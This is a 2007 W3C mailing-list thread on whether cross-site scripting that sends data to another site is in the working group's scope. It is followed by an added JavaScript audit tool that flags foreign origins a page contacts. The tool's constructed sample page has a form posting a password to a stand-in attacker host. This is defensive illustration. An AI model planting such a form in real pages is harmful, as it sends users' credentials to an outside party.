- From: Johnathan Nightingale <johnath@mozilla.com>
- Date: Mon, 26 Mar 2007 13:55:14 -0400
- To: "Stuart E. Schechter" <ses@ll.mit.edu>
- Cc: Mary Ellen Zurko <Mary_Ellen_Zurko@notesdev.ibm.com>, W3C WSC Public <public-wsc-wg@w3.org>
As Stuart says, his reorganization moved some of these. My references can be matched against this version of the document:

http://www.w3.org/2006/WSC/wiki/ThreatTrees?action=recall&rev=25

Basically the attacks I was suggesting were in-scope for our group are the ones where, for the attack to be successful, the browser needs to follow instructions on legitimate.com which require it to send data to attacker.com. Whereas we consider much of XSS to be out of scope, this piece of information ("the web page at legitimate.com is trying to access data from attacker.com") seems like a piece of the web security context.

Now, of course, deciding if and when to display that would be challenging, particularly since sites are forever interlinking in perfectly benign ways, ever more so with the recent mashup/aggregation mania. So I'm not suggesting a recommendation be written to show this information in a primary way. I am suggesting only that we not consider these kinds of attacks out of our scope.

Cheers,

J

---
Johnathan Nightingale
Human Shield
johnath@mozilla.com

On 26-Mar-07, at 1:42 PM, Stuart E. Schechter wrote:

> That's because of the changes I made after Jonathan's. See the follow-up post I sent for details.
>
>> From: Mary Ellen Zurko <Mary_Ellen_Zurko@notesdev.ibm.com>
>> Date: Mon, 26 Mar 2007 13:39:02 -0400
>> To: "Johnathan Nightingale <johnath" <johnath@mozilla.com>
>> Cc: W3C WSC Public <public-wsc-wg@w3.org>
>> Subject: Re: ACTION-164 - Elaborate Cross Site Scripting in Wiki
>> Resent-From: <public-wsc-wg@w3.org>
>> Resent-Date: Mon, 26 Mar 2007 17:39:08 +0000
>>
>> There is not currently a "2.A.i", and several others you cite.
>>
>> Mez
>>
>> Johnathan Nightingale <johnath@mozilla.com>
>> Sent by: public-wsc-wg-request@w3.org
>> 03/23/2007 10:24 AM
>>
>> To: W3C WSC Public <public-wsc-wg@w3.org>
>> cc:
>> Subject: ACTION-164 - Elaborate Cross Site Scripting in Wiki
>>
>> Hello all,
>>
>> I've updated the Threat Trees page of the Wiki with more detailed information on cross site scripting. I've also made some minor editorial changes, more clearly calling out the description and goals of each attack. You can see the current version here.
>>
>> http://www.w3.org/2006/WSC/wiki/ThreatTrees
>>
>> As discussed on the call earlier this week, much of XSS is beyond our scope. I would suggest, however, that 2.A.i, 2.A.iv, 2.B.i, and 2.B.iv, all of which involve the site sending information to a different site than the legitimate one being viewed, constitute information that a user agent *might* deem relevant to the user. The other branches are there for completeness but, operating exclusively within the site being viewed, likely represent security issues beyond our scope.
>>
>> Any comments are, of course, invited. And I hope Stuart doesn't object to my formatting changes. :)
>>
>> Cheers,
>>
>> Johnathan
>>
>> ---
>> Johnathan Nightingale
>> Human Shield
>> johnath@mozilla.com
Received on Monday, 26 March 2007 17:55:21 UTC
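The "piece of web security context" Johnathan describes in the thread above is a concrete, computable fact: given the page the user is viewing and its markup, which foreign origins does that page instruct the browser to contact, and do any of them receive submitted form data? The following is an added example, not code from the W3C thread or from Mozilla; it is a minimal audit of that kind, written as a user agent or extension author might prototype it. The HTML sample is constructed, and `legitimate.example`, `attacker.example`, `cdn.example` and `img.example` are placeholder hostnames. It resolves relative and protocol-relative URLs against the page URL, ignores `javascript:`/`data:`-style values that produce no network request, and normalises default ports so that `https://legitimate.example:443` counts as the page's own origin.

```javascript
// Added example (not part of the W3C WSC thread): enumerate the foreign origins a
// page tells the browser to contact, and flag those that would receive form data.
// Hostnames below are placeholders; the HTML sample is constructed for this demo.

// Attributes whose value makes the browser issue a request (or, for href, follow
// a navigation). form action / formaction additionally carry user-entered data.
const REQUEST_ATTRS = new Set(['src', 'href', 'action', 'formaction', 'poster', 'data']);

// Schemes that never produce a network request to another host.
const LOCAL_SCHEMES = new Set(['javascript:', 'data:', 'blob:', 'about:', 'mailto:']);

// Deliberately small tag/attribute scanner; enough for the audit, not a full HTML parser.
const TAG_RE = /<([a-z][a-z0-9-]*)\b([^>]*)>/gi;
const ATTR_RE = /([a-z-]+)\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'>]+))/gi;

// Return one record per request-bearing attribute: which element, which attribute,
// the resolved absolute URL, its origin, and whether that origin differs from the page's.
function parseReferences(pageUrl, html) {
  const page = new URL(pageUrl);
  const refs = [];
  for (const tag of html.matchAll(TAG_RE)) {
    const [, name, attrText] = tag;
    for (const attr of attrText.matchAll(ATTR_RE)) {
      const attrName = attr[1].toLowerCase();
      if (!REQUEST_ATTRS.has(attrName)) continue;
      const raw = (attr[2] ?? attr[3] ?? attr[4] ?? '').trim();
      if (raw === '') continue;
      let target;
      try {
        target = new URL(raw, page); // resolves relative and protocol-relative values
      } catch {
        continue; // unparseable value: the browser will not contact anything for it
      }
      if (LOCAL_SCHEMES.has(target.protocol)) continue;
      refs.push({
        tag: name.toLowerCase(),
        attr: attrName,
        url: target.href,
        origin: target.origin,
        crossOrigin: target.origin !== page.origin,
      });
    }
  }
  return refs;
}

// Summarise the cross-origin references per foreign origin: how many there are,
// whether any of them submit form data, and whether any load script from there.
// This is the datum a user agent could surface: "this page sends data to X".
function foreignOrigins(pageUrl, html) {
  const summary = new Map();
  for (const ref of parseReferences(pageUrl, html)) {
    if (!ref.crossOrigin) continue;
    const entry = summary.get(ref.origin)
      ?? { origin: ref.origin, count: 0, submitsForms: false, loadsScript: false };
    entry.count += 1;
    if (ref.tag === 'form' || ref.attr === 'formaction') entry.submitsForms = true;
    if (ref.tag === 'script') entry.loadsScript = true;
    summary.set(ref.origin, entry);
  }
  return [...summary.values()].sort((a, b) => a.origin.localeCompare(b.origin));
}

// Constructed sample page: a first-party stylesheet, a third-party script, a
// protocol-relative image, a javascript: link, a form posting to a foreign origin
// with a same-origin formaction button, and a same-origin iframe with an explicit port.
const SAMPLE_PAGE_URL = 'https://legitimate.example/account';
const SAMPLE_HTML = `
<html><head>
<link rel="stylesheet" href="/static/site.css">
<script src="https://cdn.example/lib.js"></script>
</head><body>
<img src="//img.example/logo.png">
<a href="javascript:void(0)">noop</a>
<form action="https://attacker.example/collect" method="post">
  <input name="password"><button formaction="/login">Go</button>
</form>
<iframe src='https://legitimate.example:443/embed'></iframe>
</body></html>`;

console.log(JSON.stringify(foreignOrigins(SAMPLE_PAGE_URL, SAMPLE_HTML), null, 2));
```

On the constructed sample, `foreignOrigins` reports three foreign origins, with `https://attacker.example` marked as a form-submission target and `https://cdn.example` as a script source, while the `:443` iframe and the `/login` button are recognised as same-origin. That is exactly the distinction the thread draws: the page is mostly interlinking benignly (a CDN script, an image host), and the single reference worth a user's attention is the one that carries their data elsewhere.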